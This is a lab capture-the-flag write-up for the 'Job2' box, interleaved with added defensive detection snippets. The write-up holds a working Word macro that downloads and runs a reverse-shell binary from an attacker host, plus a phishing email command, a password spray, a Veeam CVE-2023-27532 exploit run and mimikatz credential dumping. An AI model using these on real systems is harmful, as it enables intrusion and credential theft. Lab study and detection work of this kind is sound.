Job2: a hard Windows machine, from phishing to admin
Preparation
1. Enable Developer Tools in the Ribbon Menu to gain access to macros
2. Name your Macro AutoOpen() if you are working with Word 2016+
3. Select the Current Document as the place to store the Macro
4. Don't use .docx as the file extension, since it won't allow embedded macros. Use either .doc or .docm.
Do the testing on your LAN first (a Kali box and a Windows 11 PC).
I used this macro:

```vba
Sub AutoOpen()
    a = Shell("""curl"" ""192.168.1.41/rcat.exe"" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
    b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)
End Sub
```
Open puck3.docm twice: the first time to download rcat.exe, the second time to execute it.
If you receive a reverse shell, start the Job2 box to go for the real target.
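From the defender's side, the preparation above rests on one fact: the macro lives in a separate part of the container, so an attachment filter has to look inside the file rather than at its extension. As an added example (not from the write-up), a Python check that inspects an Office Open XML attachment for a vbaProject.bin part and the macro-enabled content type; the sample document it builds is constructed, not the puck3.docm from the post.

```python
import io
import zipfile

# The content type Word uses for .docm, and the zip part that holds the VBA
# project regardless of what the file is called.
MACRO_ENABLED_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_DOCX_CT = ("application/vnd.openxmlformats-officedocument"
                 ".wordprocessingml.document.main+xml")
VBA_PART = "word/vbaProject.bin"


def inspect_office_attachment(data: bytes) -> dict:
    """Judge the attachment by content, so a .docm renamed to .doc or .docx
    is still recognised as a macro document."""
    result = {"is_ooxml": False, "has_vba_project": False,
              "declares_macro_enabled": False}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result  # legacy OLE2 .doc or not an Office file at all
    with zf:
        names = set(zf.namelist())
        result["is_ooxml"] = "[Content_Types].xml" in names
        result["has_vba_project"] = VBA_PART in names
        if result["is_ooxml"]:
            types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            result["declares_macro_enabled"] = MACRO_ENABLED_CT in types_xml
    return result


def should_quarantine(data: bytes) -> bool:
    """Either signal alone is enough: a vbaProject.bin part means code,
    and a macro-enabled content type means Word will offer to run it."""
    r = inspect_office_attachment(data)
    return r["has_vba_project"] or r["declares_macro_enabled"]


def build_sample(macro: bool) -> bytes:
    """Constructed minimal OOXML container used only to exercise the checks
    above; it is not a valid Word document."""
    content_type = MACRO_ENABLED_CT if macro else PLAIN_DOCX_CT
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types><Override PartName="/word/document.xml" '
                    f'ContentType="{content_type}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if macro:
            zf.writestr(VBA_PART, b"\xd0\xcf\x11\xe0 placeholder OLE header")
    return buf.getvalue()
```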
Here we go …
We start with an nmap scan:
```
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-11 10:58 CEST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining)
Nmap scan report for job2.vl (10.10.122.114)
Host is up (0.019s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 a39477ca160eecfb238667c60ae3ca7b (RSA)
|   256 0e2a317094995d95d4f840d5b5368e88 (ECDSA)
|_  256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519)
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp  open  rpcbind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
445/tcp  open  microsoft-ds?
1063/tcp open  rpcbind
2049/tcp open  rpcbind
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-07-10T08:57:44
|_Not valid after:  2025-01-09T08:57:44
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-07-11T08:59:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds
```
We look at the website and find out how to apply for the job.
Send your CV twice (first, in the macro of puck3.docm, replace the LAN test IP with your tun0 IP on the VulnLab VPN):
```
┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ sendemail -s job2.vl -f "puck <puck@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a puck3.docm
Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!
```
Catch the shell:

```
┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.122.114 - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -
```

```
┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.122.114] 50302
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\Windows\system32>whoami
job2\julian

C:\Windows\system32>net users

User accounts for \\JOB2

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand
Guest                    Julian                   svc_veeam
WDAGUtilityAccount
The command completed successfully.

C:\Windows\system32>
```
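The foothold above is a textbook process chain on the endpoint: Word spawns curl, curl drops a file into C:\Windows\Tasks, and Word then runs that file. As an added example (not from the write-up), a small Python classifier for Sysmon process-creation events that flags exactly that chain; the events are constructed in the shape of Event ID 1 fields and mirror the macro's paths, they are not logs taken from the box.

```python
# Constructed sample events in the shape of Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl 192.168.1.41/rcat.exe -o C:\Windows\tasks\rcat_192.168.1.41_443.exe"},
    {"ProcessId": 4188,
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\tasks\rcat_192.168.1.41_443.exe",
     "CommandLine": r"C:\Windows\tasks\rcat_192.168.1.41_443.exe"},
    {"ProcessId": 5002, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe cv.txt"},
]

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Built-in tools a macro typically shells out to (curl.exe ships with current Windows).
SHELL_TOOLS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe",
               "cmd.exe", "mshta.exe", "wscript.exe", "rundll32.exe"}
# User-writable locations under system paths that rarely host legitimate executables.
STAGING_DIRS = ("c:\\windows\\tasks\\", "c:\\windows\\temp\\", "c:\\programdata\\")


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> list:
    """Return the names of the rules this process-creation event trips."""
    hits = []
    parent = _name(ev["ParentImage"])
    image = ev["Image"].lower()
    cmdline = ev.get("CommandLine", "").lower()
    if parent in OFFICE_HOSTS and _name(image) in SHELL_TOOLS:
        hits.append("office-spawned-shell-tool")
    if parent in OFFICE_HOSTS and image.startswith(STAGING_DIRS):
        hits.append("office-spawned-staged-binary")
    if _name(image) in SHELL_TOOLS and any(d in cmdline for d in STAGING_DIRS):
        hits.append("shell-tool-writes-staging-dir")
    return hits


def scan(events) -> dict:
    """Map ProcessId -> rule hits for every event that tripped at least one rule."""
    return {ev["ProcessId"]: h for ev in events if (h := classify(ev))}
```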
Next I ran a brute-force against Ferdinand's account over WinRM:

```
┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ crackmapexec winrm 10.10.122.114 -u Ferdinand -p /usr/share/wordlists/rockyou.txt
SMB         10.10.122.114   5985   JOB2             [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2)
HTTP        10.10.122.114   5985   JOB2             [*] http://10.10.122.114:5985/wsman
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:12345
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456789
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:password
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:iloveyou
```

and it found Ferdinand's password.
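The run above leaves a clear trace on the target: one account, one source, a logon failure per guess, then a success from the same source. As an added example (not part of the write-up), a Python pass over Security log records that flags that pattern; the records are constructed in the shape of 4625/4624 fields, not logs from the box.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records (4625 = logon failure, 4624 = logon success): twelve
# guesses against Ferdinand one second apart, then a success from the same
# source, plus two unrelated failures for Julian half an hour apart.
SAMPLE_EVENTS = [
    {"EventID": 4625, "TimeCreated": f"2024-07-11T11:10:{i:02d}", "TargetUserName": "Ferdinand",
     "LogonType": 3, "IpAddress": "10.8.2.138"} for i in range(12)
] + [
    {"EventID": 4624, "TimeCreated": "2024-07-11T11:10:20", "TargetUserName": "Ferdinand",
     "LogonType": 3, "IpAddress": "10.8.2.138"},
    {"EventID": 4625, "TimeCreated": "2024-07-11T11:12:00", "TargetUserName": "Julian",
     "LogonType": 3, "IpAddress": "10.10.122.5"},
    {"EventID": 4625, "TimeCreated": "2024-07-11T11:40:00", "TargetUserName": "Julian",
     "LogonType": 3, "IpAddress": "10.10.122.5"},
]


def analyse(events, threshold=10, window=timedelta(seconds=60)):
    """Return {(user, source_ip): info} for every account/source pair with at
    least `threshold` network logon failures inside one `window`, noting
    whether the same source logged on successfully once the burst began."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ev in events:
        if ev.get("LogonType") != 3:
            continue  # only network logons (WinRM, SMB) are of interest here
        key = (ev["TargetUserName"].lower(), ev["IpAddress"])
        bucket = failures if ev["EventID"] == 4625 else successes
        bucket[key].append(datetime.fromisoformat(ev["TimeCreated"]))
    findings = {}
    for key, times in failures.items():
        times.sort()
        start, burst_at = 0, None
        for i, t in enumerate(times):
            while t - times[start] > window:  # slide the window's left edge
                start += 1
            if burst_at is None and i - start + 1 >= threshold:
                burst_at = t                  # moment the threshold was crossed
        if burst_at is not None:
            findings[key] = {
                "failures": len(times),
                "first": times[0].isoformat(),
                "succeeded_after": any(s >= burst_at for s in successes.get(key, [])),
            }
    return findings
```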
Next, evil-winrm onto the box, where we find Veeam Backup installed (its service is listening on port 9401), and use CVE-2023-27532-RCE-Only to finish Job2:

```
┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i 10.10.122.114

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
  TCP    0.0.0.0:9401           0.0.0.0:0              LISTENING       2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents>
```
```
*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
Data: 573544 bytes of 573544 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
Data: 5925652 bytes of 5925652 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target 127.0.0.1 --cmd c:\temp\rcat_10.8.2.138_443.exe
Targeting 127.0.0.1:9401
```
and catch the admin shell:

```
┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.103.24] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\users\Administrator\Desktop> dir
dir


    Directory: C:\users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/3/2023   2:04 PM           1029 LINQPad 5.lnk
-a----         5/3/2023   4:00 PM             36 root.txt


PS C:\users\Administrator\Desktop> type root.txt
type root.txt
VL{62e<REDACTED>2b7}
PS C:\users\Administrator\Desktop>
```
That’s all.
Beyond root
```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

764     {0;000003e7} 1 D 29290          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01a2aee9} 3 F 35131903    JOB2\puck       S-1-5-21-3935782767-3829597994-1046841959-1004  (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 37906026    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959

SAMKey : 36c26e0a457c1d613a608d104acca9e9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 6f2<REDACTED>04a
```
The startup entry in Julian's profile that watches the attachments folder and opens whatever lands there in Word:

C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat

```
powershell \windows\phishsim.ps1
```

phishsim.ps1:

```powershell
Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
$action = {
    $name = $event.SourceEventArgs.FullPath
    $changetype = $event.SourceEventArgs.ChangeType
    Write-Host "$name was $changetype at $(get-date)"
    if(!$name.Contains("~")){
        if(Test-Path $name){
            Write-Host "Opening $name"
            Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
            sleep 45
            Write-Host "Resetting.."
            Get-Process "WINWORD.EXE" | Stop-Process -Force
            Get-Process "WINWORD" | Stop-Process -Force
            sleep 5
            Remove-Item $name -Force
        }
    }
}
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action
for(;;){ sleep 45 }
```